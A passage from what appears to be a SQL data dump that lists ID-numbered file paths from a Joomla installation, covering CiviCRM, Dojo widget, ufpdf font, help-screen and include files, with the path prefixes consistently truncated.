urrencyTextbox.js'),(12723,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/DatePicker.js'),(12724,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/DateTextbox.js'),(12725,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/DebugConsole.js'),(12726,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Dialog.js'),(12727,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/DocPane.js'),(12728,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/DomWidget.js'),(12729,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/DropdownContainer.js'),(12730,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/DropdownDatePicker.js'),(12731,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/DropdownTimePicker.js'),(12732,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Editor.js'),(12733,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Editor2.js'),(12734,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Editor2Plugin/AlwaysShowToolbar.js'),(12735,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Editor2Plugin/ContextMenu.js'),(12736,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Editor2Plugin/CreateLinkDialog.js'),(12737,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Editor2Plugin/FindReplace.js'),(12738,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Editor2Plugin/FindReplaceDialog.js'),(12739,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Editor2Plugin/InsertImageDialog.js'),(12740,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Editor2Plugin/InsertTableDialog.js'),(12741,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Editor2Plugin/SimpleSignalCommands.js'),(12742,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Editor2Plugin/TableOperation.js'),(12743,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Editor2Plugin/ToolbarDndSupport.js'),(12744,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Editor2Plugin/__package__.js'),(12745,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Editor2Toolbar.js'),(12746,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/FilteringTable.js'),(12747,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/FisheyeList.js'),(12748,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/FloatingPane.js'),(12749,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Form.js'),(12750,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/GoogleMap.js'),(12751,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/HslColorPicker.js'),(12752,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/HtmlWidget.js'),(12753,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/InlineEditBox.js'),(12754,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/IntegerTextbox.js'),(12755,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/InternetTextbox.js'),(12756,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/LayoutContainer.js'),(12757,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/LinkPane.js'),(12758,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Manager.js'),(12759,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Menu2.js'),(12760,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/MonthlyCalendar.js'),(12761,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/PageContainer.js'),(12762,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Parse.js'),(12763,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/PopupContainer.js'),(12764,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/ProgressBar.js'),(12765,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/RadioGroup.js'),(12766,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/RealNumberTextbox.js'),(12767,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/RegexpTextbox.js'),(12768,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/RemoteTabController.js'),(12769,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Repeater.js'),(12770,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/ResizableTextarea.js'),(12771,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/ResizeHandle.js'),(12772,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/RichText.js'),(12773,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Rounded.js'),(12774,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Select.js'),(12775,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Show.js'),(12776,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/ShowAction.js'),(12777,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/ShowSlide.js'),(12778,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/SlideShow.js'),(12779,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Slider.js'),(12780,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/SortableTable.js'),(12781,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Spinner.js'),(12782,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/SplitContainer.js'),(12783,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/SvgButton.js'),(12784,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/SvgWidget.js'),(12785,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/SwtWidget.js'),(12786,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TabContainer.js'),(12787,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TaskBar.js'),(12788,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Textbox.js'),(12789,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TimePicker.js'),(12790,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TitlePane.js'),(12791,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Toaster.js'),(12792,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Toggler.js'),(12793,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Toolbar.js'),(12794,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Tooltip.js'),(12795,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Tree.js'),(12796,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TreeBasicController.js'),(12797,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TreeBasicControllerV3.js'),(12798,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TreeCommon.js'),(12799,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TreeContextMenu.js'),(12800,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TreeContextMenuV3.js'),(12801,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TreeControllerExtension.js'),(12802,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TreeDemo.js'),(12803,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TreeDeselectOnDblselect.js'),(12804,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TreeDisableWrapExtension.js'),(12805,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TreeDndControllerV3.js'),(12806,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TreeDocIconExtension.js'),(12807,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TreeEditor.js'),(12808,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TreeEmphasizeOnSelect.js'),(12809,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TreeExpandToNodeOnSelect.js'),(12810,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TreeExtension.js'),(12811,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TreeLinkExtension.js'),(12812,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TreeLoadingController.js'),(12813,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TreeLoadingControllerV3.js'),(12814,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TreeNode.js'),(12815,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TreeNodeV3.js'),(12816,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TreeRPCController.js'),(12817,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TreeRpcControllerV3.js'),(12818,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TreeSelector.js'),(12819,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TreeSelectorV3.js'),(12820,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TreeTimeoutIterator.js'),(12821,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TreeToggleOnSelect.js'),(12822,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TreeV3.js'),(12823,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/TreeWithNode.js'),(12824,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/UsTextbox.js'),(12825,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/ValidationTextbox.js'),(12826,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Widget.js'),(12827,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/Wizard.js'),(12828,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/YahooMap.js'),(12829,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/__package__.js'),(12830,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/demoEngine/DemoContainer.js'),(12831,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/demoEngine/DemoItem.js'),(12832,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/demoEngine/DemoNavigator.js'),(12833,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/demoEngine/DemoPane.js'),(12834,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/demoEngine/SourcePane.js'),(12835,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/demoEngine/__package__.js'),(12836,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/demoEngine/templates/DemoContainer.html'),(12837,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/demoEngine/templates/DemoItem.html'),(12838,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/demoEngine/templates/DemoNavigator.html'),(12839,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/demoEngine/templates/DemoPane.html'),(12840,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/demoEngine/templates/SourcePane.html'),(12841,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/html/layout.js'),(12842,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/html/stabile.js'),(12843,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/nls/DropdownDatePicker.js'),(12844,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/nls/DropdownTimePicker.js'),(12845,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/nls/TimePicker.js'),(12846,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/nls/fr/validate.js'),(12847,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/nls/ja/validate.js'),(12848,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/nls/validate.js'),(12849,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/nls/zh-cn/validate.js'),(12850,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/svg/Chart.js'),(12851,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/AccordionPane.html'),(12852,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/ButtonTemplate.html'),(12853,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/Checkbox.html'),(12854,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/CheckboxA11y.html'),(12855,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/CiviCrmDatePicker.html'),(12856,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/ComboBox.html'),(12857,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/ComboButtonTemplate.html'),(12858,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/DatePicker.html'),(12859,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/DemoEngine.html'),(12860,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/Dialog.html'),(12861,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/DocPane.html'),(12862,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/DropDownButtonTemplate.html'),(12863,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/Editor2/Dialog/createlink.html'),(12864,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/Editor2/Dialog/find.html'),(12865,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/Editor2/Dialog/insertimage.html'),(12866,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/Editor2/Dialog/inserttable.html'),(12867,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/Editor2/Dialog/replace.html'),(12868,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/Editor2/EditorDialog.html'),(12869,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/Editor2/EditorToolbar_FontName.html'),(12870,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/Editor2/EditorToolbar_FontSize.html'),(12871,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/Editor2/EditorToolbar_FormatBlock.html'),(12872,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/EditorToolbar.html'),(12873,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/EditorToolbarOneline.html'),(12874,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/FloatingPane.html'),(12875,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/HslColorPicker.svg'),(12876,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/InlineEditBox.html'),(12877,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/MonthlyCalendar.html'),(12878,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/ProgressBar.html'),(12879,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/ResizableTextarea.html'),(12880,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/Show.html'),(12881,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/ShowSlide.html'),(12882,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/SlideShow.html'),(12883,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/Slider.html'),(12884,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/SliderHorizontal.html'),(12885,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/SliderVertical.html'),(12886,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/Spinner.html'),(12887,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/TabContainer.html'),(12888,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/TaskBarItemTemplate.html'),(12889,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/Textbox.html'),(12890,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/TimePicker.html'),(12891,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/TitlePane.html'),(12892,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/ValidationTextbox.html'),(12893,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/Wizard.html'),(12894,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/images/no.svg'),(12895,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/templates/richtextframe.html'),(12896,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/validate.js'),(12897,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/widget/vml/Chart.js'),(12898,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/xml/Parse.js'),(12899,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/xml/XslTransform.js'),(12900,'onents/com_login/com_civicrm/civicrm/packages/dojo/src/xml/__package__.js'),(12901,'onents/com_login/com_civicrm/civicrm/packages/remote-list.pear.php.net'),(12902,'onents/com_login/com_civicrm/civicrm/packages/ufpdf/font/DejaVuSans.php'),(12903,'onents/com_login/com_civicrm/civicrm/packages/ufpdf/font/courier.php'),(12904,'onents/com_login/com_civicrm/civicrm/packages/ufpdf/font/helvetica.php'),(12905,'onents/com_login/com_civicrm/civicrm/packages/ufpdf/font/helveticab.php'),(12906,'onents/com_login/com_civicrm/civicrm/packages/ufpdf/font/helveticabi.php'),(12907,'onents/com_login/com_civicrm/civicrm/packages/ufpdf/font/helveticai.php'),(12908,'onents/com_login/com_civicrm/civicrm/packages/ufpdf/font/makefont/makefont.php'),(12909,'onents/com_login/com_civicrm/civicrm/packages/ufpdf/font/symbol.php'),(12910,'onents/com_login/com_civicrm/civicrm/packages/ufpdf/font/times.php'),(12911,'onents/com_login/com_civicrm/civicrm/packages/ufpdf/font/timesb.php'),(12912,'onents/com_login/com_civicrm/civicrm/packages/ufpdf/font/timesbi.php'),(12913,'onents/com_login/com_civicrm/civicrm/packages/ufpdf/font/timesi.php'),(12914,'onents/com_login/com_civicrm/civicrm/packages/ufpdf/font/zapfdingbats.php'),(12915,'onents/com_login/com_civicrm/civicrm/packages/ufpdf/fpdf.php'),(12916,'onents/com_login/com_civicrm/civicrm/packages/ufpdf/tools/makefontuni.php'),(12917,'onents/com_login/com_civicrm/civicrm/packages/ufpdf/ttf2ufm-src/CHANGES.html'),(12918,'onents/com_login/com_civicrm/civicrm/packages/ufpdf/ttf2ufm-src/FONTS.hpux.html'),(12919,'onents/com_login/com_civicrm/civicrm/packages/ufpdf/ttf2ufm-src/FONTS.html'),(12920,'onents/com_login/com_civicrm/civicrm/packages/ufpdf/ttf2ufm-src/README.html'),(12921,'onents/com_login/com_civicrm/civicrm/packages/ufpdf/ttf2ufm-src/app/TeX/README.html'),(12922,'onents/com_login/com_civicrm/civicrm/packages/ufpdf/ttf2ufm-src/app/X11/README.html'),(12923,'onents/com_login/com_civicrm/civicrm/packages/ufpdf/ttf2ufm-src/app/netscape/README.html'),(12924,'onents/com_login/com_civicrm/civicrm/packages/ufpdf/ttf2ufm-src/encodings/README.html'),(12925,'onents/com_login/com_civicrm/civicrm/packages/ufpdf/ttf2ufm-src/other/README.html'),(12926,'onents/com_login/com_civicrm/civicrm/packages/ufpdf/ufpdf-test.php'),(12927,'onents/com_login/com_civicrm/civicrm/packages/ufpdf/ufpdf.php'),(12928,'onents/com_login/com_civicrm/civicrm/templates/CRM/common/civicrm.settings.php.sample.tpl'),(12929,'onents/com_login/com_civicrm/civicrm.html.php'),(12930,'onents/com_login/com_civicrm/civicrm.php'),(12931,'onents/com_login/com_civicrm/configure.php'),(12932,'onents/com_login/com_civicrm/install.civicrm.php'),(12933,'onents/com_login/com_civicrm/toolbar.civicrm.php'),(12934,'onents/com_login/com_civicrm/uninstall.civicrm.php'),(12935,'onents/com_login/index.html'),(12936,'onents/com_login/login.html.php'),(12937,'onents/com_login/login.php'),(12938,'onents/com_messages/index.html'),(12939,'onents/com_messages/messages.class.php'),(12940,'onents/com_newsfeeds/index.html'),(12941,'onents/com_newsfeeds/newsfeeds.html.php'),(12942,'onents/com_newsfeeds/newsfeeds.php'),(12943,'onents/com_poll/images/index.html'),(12944,'onents/com_poll/index.html'),(12945,'onents/com_poll/poll.class.php'),(12946,'onents/com_poll/poll.html.php'),(12947,'onents/com_poll/poll.php'),(12948,'onents/com_registration/index.html'),(12949,'onents/com_registration/registration.html.php'),(12950,'onents/com_registration/registration.php'),(12951,'onents/com_rss/index.html'),(12952,'onents/com_rss/rss.php'),(12953,'onents/com_search/index.html'),(12954,'onents/com_search/search.html.php'),(12955,'onents/com_search/search.php'),(12956,'onents/com_user/index.html'),(12957,'onents/com_user/user.html.php'),(12958,'onents/com_user/user.php'),(12959,'onents/com_weblinks/index.html'),(12960,'onents/com_weblinks/weblinks.class.php'),(12961,'onents/com_weblinks/weblinks.html.php'),(12962,'onents/com_weblinks/weblinks.php'),(12963,'onents/com_wrapper/index.html'),(12964,'onents/com_wrapper/wrapper.html.php'),(12965,'onents/com_wrapper/wrapper.php'),(12966,'onents/index.html'),(12967,'iguration.php'),(12968,'or/editor.php'),(12969,'or/googlehostedservice.html'),(12970,'or/index.html'),(12971,'version.php'),(12972,'als.php'),(12973,'/css/index.html'),(12974,'/index.html'),(12975,'/joomla.credits.html'),(12976,'/joomla.glossary.html'),(12977,'/joomla.support.html'),(12978,'/joomla.whatsnew100.html'),(12979,'/screen.banners.client.edit.html'),(12980,'/screen.banners.client.html'),(12981,'/screen.banners.edit.html'),(12982,'/screen.banners.html'),(12983,'/screen.banners.what.html'),(12984,'/screen.categories.contact.edit.html'),(12985,'/screen.categories.contact.html'),(12986,'/screen.categories.copy.html'),(12987,'/screen.categories.edit.html'),(12988,'/screen.categories.html'),(12989,'/screen.categories.move.html'),(12990,'/screen.categories.newsfeeds.edit.html'),(12991,'/screen.categories.newsfeeds.html'),(12992,'/screen.categories.weblinks.edit.html'),(12993,'/screen.categories.weblinks.html'),(12994,'/screen.checkin.html'),(12995,'/screen.component.what.html'),(12996,'/screen.config.html'),(12997,'/screen.contact.what.html'),(12998,'/screen.contactmanager.edit.html'),(12999,'/screen.contactmanager.html'),(13000,'/screen.content..item.bysection.html'),(13001,'/screen.content.archive.html'),(13002,'/screen.content.edit.html'),(13003,'/screen.content.html'),(13004,'/screen.content.impressions.html'),(13005,'/screen.content.item.copy.html'),(13006,'/screen.content.item.move.html'),(13007,'/screen.content.what.html'),(13008,'/screen.cpanel.html'),(13009,'/screen.frontpage.html'),(13010,'/screen.installer.components.html'),(13011,'/screen.installer.html'),(13012,'/screen.installer.mambots.html'),(13013,'/screen.installer.modules.html'),(13014,'/screen.installer.template.admin.html'),(13015,'/screen.installer.template.site.html'),(13016,'/screen.installer2.html'),(13017,'/screen.languages.edit.html'),(13018,'/screen.languages.html'),(13019,'/screen.mambots.edit.cloaking.html'),(13020,'/screen.mambots.edit.codesupp.html'),(13021,'/screen.mambots.edit.geshi.html'),(13022,'/screen.mambots.edit.html'),(13023,'/screen.mambots.edit.img.button.html'),(13024,'/screen.mambots.edit.legacy.html'),(13025,'/screen.mambots.edit.modpos.html'),(13026,'/screen.mambots.edit.mosimage.html'),(13027,'/screen.mambots.edit.mosrating.html'),(13028,'/screen.mambots.edit.nowysiwyg.html'),(13029,'/screen.mambots.edit.page.button.html'),(13030,'/screen.mambots.edit.sef.html'),(13031,'/screen.mambots.edit.tinymce.html'),(13032,'/screen.mambots.html'),(13033,'/screen.mambots.search.categories.html'),(13034,'/screen.mambots.search.content.html'),(13035,'/screen.mambots.search.newsfeeds.html'),(13036,'/screen.mambots.search.sections.html'),(13037,'/screen.mambots.search.weblinks.html'),(13038,'/screen.mambots.what.html'),(13039,'/screen.mediamanager.html'),(13040,'/screen.menumanager.copy.html'),(13041,'/screen.menumanager.html'),(13042,'/screen.menumanager.new.html'),(13043,'/screen.menus.blog.content.cat.arch.html'),(13044,'/screen.menus.blog.content.cat.html'),(13045,'/screen.menus.blog.content.sec.arch.html'),(13046,'/screen.menus.blog.content.sec.html'),(13047,'/screen.menus.comp.contact.html'),(13048,'/screen.menus.comp.front.html'),(13049,'/screen.menus.comp.html'),(13050,'/screen.menus.comp.login.html'),(13051,'/screen.menus.comp.news.html'),(13052,'/screen.menus.comp.polls.html'),(13053,'/screen.menus.comp.search.html'),(13054,'/screen.menus.comp.wl.html'),(13055,'/screen.menus.copy.html'),(13056,'/screen.menus.edit.html'),(13057,'/screen.menus.html'),(13058,'/screen.menus.link.componentitem.html'),(13059,'/screen.menus.link.contactitem.html'),(13060,'/screen.menus.link.contentitem.html'),(13061,'/screen.menus.link.newsfeed.html'),(13062,'/screen.menus.link.staticitem.html'),(13063,'/screen.menus.link.url.html'),(13064,'/screen.menus.list.content.sec.html'),(13065,'/screen.menus.move.html'),(13066,'/screen.menus.new.html'),(13067,'/screen.menus.other.html'),(13068,'/screen.menus.place.html'),(13069,'/screen.menus.submit.content.html'),(13070,'/screen.menus.table.contact.cat.html'),(13071,'/screen.menus.table.content.cat.html'),(13072,'/screen.menus.table.news.cat.html'),(13073,'/screen.menus.table.weblink.cat.html'),(13074,'/screen.menus.top.html'),(13075,'/screen.menus.user.html'),(13076,'/screen.menus.what.html'),(13077,'/screen.menus.wrapper.html'),(13078,'/screen.messages.conf.html'),(13079,'/screen.messages.inbox.html'),(13080,'/screen.modadmin.edit.components.html'),(13081,'/screen.modadmin.edit.fullmenu.html'),(13082,'/screen.modadmin.edit.latest.html'),(13083,'/screen.modadmin.edit.logged.html'),(13084,'/screen.modadmin.edit.menustats.html'),(13085,'/screen.modadmin.edit.online.html'),(13086,'/screen.modadmin.edit.path.html'),(13087,'/screen.modadmin.edit.popular.html'),(13088,'/screen.modadmin.edit.quickicons.html'),(13089,'/screen.modadmin.edit.sysmess.html'),(13090,'/screen.modadmin.edit.toolbar.html'),(13091,'/screen.modadmin.edit.unread.html'),(13092,'/screen.modadmin.html'),(13093,'/screen.modadmin.new.html'),(13094,'/screen.modules.edit.archive.html'),(13095,'/screen.modules.edit.banners.html'),(13096,'/screen.modules.edit.chooser.html'),(13097,'/screen.modules.edit.html'),(13098,'/screen.modules.edit.latest.html'),(13099,'/screen.modules.edit.login.html'),(13100,'/screen.modules.edit.main.html'),(13101,'/screen.modules.edit.newsflash.html'),(13102,'/screen.modules.edit.other.html'),(13103,'/screen.modules.edit.polls.html'),(13104,'/screen.modules.edit.popular.html'),(13105,'/screen.modules.edit.randimage.html'),(13106,'/screen.modules.edit.related.html'),(13107,'/screen.modules.edit.search.html'),(13108,'/screen.modules.edit.sections.html'),(13109,'/screen.modules.edit.statistics.html'),(13110,'/screen.modules.edit.syndicate.html'),(13111,'/screen.modules.edit.top.html'),(13112,'/screen.modules.edit.user.html'),(13113,'/screen.modules.edit.whosonline.html'),(13114,'/screen.modules.edit.wrapper.html'),(13115,'/screen.modules.html'),(13116,'/screen.modules.new.html'),(13117,'/screen.modules.what.html'),(13118,'/screen.newsfeed.what.html'),(13119,'/screen.newsfeeds.edit.html'),(13120,'/screen.newsfeeds.html'),(13121,'/screen.polls.edit.html'),(13122,'/screen.polls.html'),(13123,'/screen.polls.what.html'),(13124,'/screen.preview.html'),(13125,'/screen.section.copy.html'),(13126,'/screen.sections.edit.html'),(13127,'/screen.sections.html'),(13128,'/screen.staticcontent.edit.html'),(13129,'/screen.staticcontent.html'),(13130,'/screen.stats.searches.html'),(13131,'/screen.stats.statistics.html'),(13132,'/screen.syndicate.html'),(13133,'/screen.system.info.html'),(13134,'/screen.templates.admin.html'),(13135,'/screen.templates.assign.html'),(13136,'/screen.templates.css.html'),(13137,'/screen.templates.html'),(13138,'/screen.templates.html.html'),(13139,'/screen.templates.modules.html'),(13140,'/screen.trashmanager.html'),(13141,'/screen.users.acl.html'),(13142,'/screen.users.edit.html'),(13143,'/screen.users.html'),(13144,'/screen.users.massmail.html'),(13145,'/screen.users.new.html'),(13146,'/screen.weblink.edit.html'),(13147,'/screen.weblink.html'),(13148,'/screen.weblink.what.html'),(13149,'es/M_images/index.html'),(13150,'es/banners/index.html'),(13151,'es/index.html'),(13152,'es/smilies/index.html'),(13153,'es/stories/food/index.html'),(13154,'es/stories/fruit/index.html'),(13155,'es/stories/index.html'),(13156,'udes/Archive/Tar.php'),(13157,'udes/Archive/index.html'),(13158,'udes/Cache/Lite/Function.php'),(13159,'udes/Cache/Lite/Output.php'),(13160,'udes/Cache/Lite/index.html'),(13161,'udes/Cache/Lite.php'),(13162,'udes/Cache/index.html'),(13163,'udes/HTML_toolbar.php'),(13164,'udes/PEAR/PEAR.php'),(13165,'udes/PEAR/index.html'),(13166,'udes/agent_browser.php'),(13167,'udes/agent_os.php'),(13168,'udes/class.ezpdf.php'),(13169,'udes/class.pdf.php'),(13170,'udes/compat.php41x.php'),(13171,'udes/compat.php42x.php'),(13172,'udes/compat.php50x.php'),(13173,'udes/database.mysql5.php'),(13174,'udes/database.mysqli.php'),(13175,'udes/database.php'),(13176,'udes/domit/dom_xmlrpc_array_document.php'),(13177,'udes/domit/dom_xmlrpc_array_parser.php'),(13178,'udes/domit/dom_xmlrpc_base64.php'),(13179,'udes/domit/dom_xmlrpc_builder.php'),(13180,'udes/domit/dom_xmlrpc_client.php'),(13181,'udes/domit/dom_xmlrpc_constants.php'),(13182,'udes/domit/dom_xmlrpc_datetime_iso8601.php'),(13183,'udes/domit/dom_xmlrpc_domit_lite_parser.php'),(13184,'udes/domit/dom_x